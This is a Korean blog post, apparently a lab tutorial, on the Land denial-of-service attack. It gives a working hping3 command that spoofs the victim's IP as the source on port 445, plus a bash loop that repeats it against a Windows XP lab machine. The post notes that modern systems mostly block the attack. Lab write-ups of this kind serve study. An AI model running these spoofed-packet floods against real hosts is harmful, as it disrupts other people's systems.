※ 본 게시글은 보안 학습목적으로 게시하였으며, 이를 악용할 시에 책임은 본인에게 있음을 밝힙니다.
▶ Land attack
공격대상의 IP주소로 출발지 주소를 변경한 TCP SYN 패킷을 보내면, 패킷을 받은 시스템은 TCP SYN-ACK를 자신에게 보내서 Idle timeout까지 loop가 발생한다. 결국 해당 과정을 반복해서 하면 시스템 버퍼가 범람해서 DoS 공격이 수행된다. 참고로 오늘날 Land attack은 거의 통하지 않는다. 자동으로 src IP와 dst IP가 같으면 차단해버리기 때문.
▶ 초간단 실습 : hping3 기능 활용
일단 공격자는 kali linux, ip정보는 다음과 같다.
다음으로 피해자는 windows xp, ip정보는 다음과 같다.
와이어샤크에 검색 필터를 걸어 LAND Attack 을 보기 쉽게 만들어주자.
패킷 조작툴로 hping3를 활용할 예정이다. 자세한 옵션은 각자 찾아보도록 하자. (hping3 -help)
우리는 hping3 로 TCP SYN 패킷의 ip src와 ip dst를 조작할 예정이다. hping3 명령어는 다음과 같다.
hping3 172.30.1.71(희생자 주소) -a 172.30.1.71(spoof tag) -p 445(열린 포트) -s 445(소스 포트) -S -c 1 -D(디버그)
hping3로 보낸 패킷이 성공적으로 수신된 것을 알 수 있다.
쉘 스크립트를 이용해서 다음과 같이 반복문을 짜면 LAND ATTACK을 수행할 수 있다.
for i in {1..100}; do hping3 172.30.1.71 -a 172.30.1.71 -p 445 -s 445 -S -c 1 -D; sleep 1; done;
공격이 성공하면 위와 같이 미친듯이 CPU 사용량이 뛰면서 컴퓨터를 거의 사용하지 못하게 만들 수 있다.
'정보보안(네트워크 해킹) > DoS,DDoS' 카테고리의 다른 글
| DoS/DDoS 공격 정리 (0) | 2023.02.12 |
|---|
댓글